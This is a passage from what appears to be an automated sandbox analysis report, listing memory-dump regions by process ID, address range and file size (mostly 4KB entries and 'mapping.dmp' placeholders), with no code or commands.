                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4780-291-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4780-278-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4780-277-0x0000000003920000-0x000000000395C000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                240KB

                                                                                                                                                                                                                                                                              • memory/4780-310-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4780-311-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4800-274-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                                                                              • memory/4800-264-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4864-268-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5136-495-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5172-410-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5340-417-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5376-467-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5396-419-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5404-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5448-505-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5500-471-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5536-560-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5608-422-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5684-475-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5732-510-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5788-438-0x00007FF695254060-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5808-479-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5816-439-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5848-501-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5940-504-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5944-490-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5960-572-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/6084-489-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/6108-496-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/6124-491-0x0000000000000000-mapping.dmp